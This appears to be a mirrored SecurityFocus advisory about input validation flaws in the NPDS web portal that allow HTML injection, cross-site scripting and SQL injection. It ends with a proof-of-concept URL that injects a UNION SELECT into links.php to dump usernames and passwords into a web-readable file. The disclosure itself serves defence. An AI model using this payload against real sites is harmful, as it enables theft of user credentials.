10 lines
No EOL
669 B
Text
10 lines
No EOL
669 B
Text
source: https://www.securityfocus.com/bid/13803/info
|
|
|
|
NPDS is affected by multiple vulnerabilities resulting from input validation errors. These issues may allow remote attackers to carry out HTML injection, cross-site scripting and SQL injection attacks.
|
|
|
|
This may result in the theft of authentication credentials, destruction or disclosure of sensitive data, and potentially other attacks.
|
|
|
|
All versions of NPDS are considered vulnerable to this issue at the moment.
|
|
|
|
http://www.example.com/links.php?op=search&query=google%'%20UNION%20SELECT%200,uname,pass,0,0,0,0,0%20FROM%20users%20where%20uname<>''%20INTO%20OUTFILE%20'/var/www/html/npds/sql/s
|
|
qlinjection.txt'/* |